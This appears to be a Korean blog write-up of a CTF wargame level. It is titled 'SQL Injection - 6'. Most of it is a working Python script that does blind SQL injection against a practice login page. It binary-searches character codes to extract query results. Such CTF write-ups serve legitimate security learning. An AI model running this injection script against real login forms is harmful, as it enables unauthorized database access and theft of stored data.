-
SQL Injection - 6wargame/segfault 2024. 6. 17. 10:48
이 페이지도 앞선 3,4,5와 동일하고 sqli는 가능하지만 error가 출력되지 않는다. 따라서 Blind sqli를 이용해야한다.
파이썬 코드로 풀어본다.
import requests url = "http://ctf.segfaulthub.com:7777/sqli_3/login.php" print("프로그램 시작") while True: print('종료하시려면 \'quit\' 를 입력해주세요') sql_statement = input("select문 입력 > ") if (sql_statement == 'quit'): break extracted_data = '' format = "normaltic' and (ascii(substr(({}),1,1)) > 0) and '1'='1".format(sql_statement) param = {"UserId":format,"Password":"1234","Submit":"Login"} response = requests.post(url, data=param) if "Incorrect information." in response.text: print("데이터가 없습니다.") continue i = 1 # data index while True: bottom = 32 top = 128 format = "normaltic' and (ascii(substr(({}),{},1)) > 0) and '1'='1".format(sql_statement,i) param = {"UserId":format,"Password":"1234","Submit":"Login"} response = requests.post(url, data=param) if "Incorrect information." in response.text: break while True: j = int((top+bottom)/2) format = "normaltic' and (ascii(substr(({}),{},1)) > {}) and '1'='1".format(sql_statement,i,j) param = {"UserId":format,"Password":"1234","Submit":"Login"} response = requests.post(url, data=param) if ((top-bottom)<=2): for k in range(0,3): format = "normaltic' and (ascii(substr(({}),{},1)) > {}) and '1'='1".format(sql_statement,i,j+k) param = {"UserId":format,"Password":"1234","Submit":"Login"} response = requests.post(url, data=param) if "Incorrect information." in response.text: extracted_data += chr(j+k) i += 1 break break if "Incorrect information." in response.text: top = j else: bottom = j print(extracted_data)
flag 출력 완료
'wargame > segfault' 카테고리의 다른 글
SQL Injection Advanced - SQL Injection Point 2 (0) 2024.06.17 SQL Injection Advanced - SQL Injection Point 1 (0) 2024.06.17 SQL Injection - 5 (0) 2024.06.17 SQL Injection - 4 (0) 2024.06.17 SQL Injection - 3 (0) 2024.06.17